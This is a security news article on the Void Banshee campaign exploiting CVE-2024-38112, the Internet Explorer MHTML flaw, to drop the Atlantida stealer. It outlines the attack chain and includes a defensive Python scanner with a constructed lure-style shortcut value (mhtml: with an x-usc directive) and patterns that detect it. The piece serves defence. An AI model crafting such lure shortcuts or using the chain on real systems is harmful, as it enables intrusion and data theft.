Hackers Attacking Windows Users With Internet Explorer 0-day Flaw


Hackers target legitimate Remote Monitoring and Management (RMM) tools as they provide powerful, trusted access to systems and networks.

This can facilitate the widespread and efficient deployment of malware across an organization’s infrastructure.


Cybersecurity researchers at CheckPoint recently discovered that hackers have been actively attacking Windows users with an Internet Explorer zero-day vulnerability.

Trend Micro discovered CVE-2024-38112, an MHTML remote code execution vulnerability exploited by APT group Void Banshee. 

Internet Explorer Zero-Day Vulnerability

The attack chain abuses internet shortcuts and Microsoft protocol handlers, including MHTML, to access disabled Internet Explorer and execute malicious code.


This vulnerability is used to deliver the Atlantida stealer, active since January 2024, targeting North America, Europe, and Southeast Asia for information theft and financial gain.

Attack chain of the CVE-2024-38112 zero-day campaign (Source – Trend Micro)

Despite Internet Explorer’s (IE) official end of support and disabling, its leftovers persist in modern Windows systems. 

Void Banshee exploited CVE-2024-38112, a vulnerability similar to CVE-2021-40444, using specially crafted URL files with MHTML protocol handlers and x-usc directives to access and run HTA files through the disabled IE process. 

This method bypasses IE's discontinuation and exploits its historically large attack surface. Microsoft patched the vulnerability in July 2024 by unregistering the MHTML handler from IE, the report reads.

Void Banshee exploited CVE-2024-38112 by delivering a malicious URL file, disguised as a PDF, to executive professionals and students.

Sample book lure (Source – Trend Micro)

The attack chain uses MHTML protocol handlers and x-usc directives to reach the disabled Internet Explorer, which downloads an HTA file that executes VBScript.

This culminates in invoking LoadToBadXml, a .NET Trojan loader, which then injects the Atlantida stealer into RegAsm.exe.
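The internet-shortcut stage of the chain described above is detectable from the shortcut file alone, since a URL= value that invokes the mhtml: handler and carries an x-usc directive has no place in a legitimate document link. The following scanner is an added example, not code from the report or from Trend Micro; the sample shortcuts and the placeholder hosts in them are constructed.

```python
import re
from configparser import ConfigParser, Error as ConfigError
from pathlib import Path

# Indicators taken from the campaign description: an internet shortcut whose
# URL= value invokes the MHTML protocol handler and contains an x-usc directive.
MHTML_SCHEME = re.compile(r"^\s*mhtml:", re.IGNORECASE)
X_USC_DIRECTIVE = re.compile(r"!x-usc:", re.IGNORECASE)


def parse_url_file(text):
    """Return the URL= value of an [InternetShortcut] file, or None if absent."""
    parser = ConfigParser(interpolation=None, strict=False)
    try:
        parser.read_string(text)
    except ConfigError:  # not INI-shaped at all, e.g. no section header
        return None
    if not parser.has_section("InternetShortcut"):
        return None
    return parser.get("InternetShortcut", "URL", fallback=None)


def assess_shortcut(text):
    """Return the reasons a .url file's contents look suspicious (empty = clean)."""
    url = parse_url_file(text)
    if url is None:
        return ["no URL= value found under [InternetShortcut]"]
    reasons = []
    if MHTML_SCHEME.search(url):
        reasons.append("URL uses the mhtml: protocol handler")
    if X_USC_DIRECTIVE.search(url):
        reasons.append("URL carries an x-usc directive")
    return reasons


def scan_directory(root):
    """Map every *.url file under root to its list of findings (skips clean files)."""
    findings = {}
    for path in Path(root).rglob("*.url"):
        raw = path.read_bytes()
        # Shortcuts written by Windows may be UTF-16 with a byte-order mark.
        text = raw.decode("utf-16") if raw.startswith(b"\xff\xfe") else raw.decode("utf-8", "replace")
        hits = assess_shortcut(text)
        if hits:
            findings[str(path)] = hits
    return findings


# Constructed samples: a benign shortcut and one shaped like the lure the report
# describes (mhtml: handler plus x-usc directive); hosts are placeholders.
BENIGN = "[InternetShortcut]\nURL=https://example.invalid/report.pdf\n"
SUSPICIOUS = "[InternetShortcut]\nURL=mhtml:http://lure.example.invalid/a!x-usc:http://lure.example.invalid/b\nIconFile=\n"
```

Run `scan_directory` over a mail attachment quarantine or user Downloads folder; any file that returns findings warrants the rest of the chain (HTA download, RegAsm.exe injection, TCP 6655 traffic) being checked on that host.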

Atlantida stealer’s collected data (Source – Trend Micro)

Atlantida, which is built on open-source stealers, collects extensive confidential data from various applications, browsers, and system locations, compresses it, and transmits it to the attacker over TCP.

The malware packs all collected data into a ZIP file and then tunnels it over TCP port 6655 to the attacker’s C&C server.

Despite Internet Explorer being disabled, attackers exploit its remaining presence to install ransomware and other dangerous software.

Void Banshee is an example of an APT group abusing unpatched and unsupported services, which highlights a major security concern.

Rapid response time combined with complex security solutions is highly recommended for breach resolution and systems safeguarding.



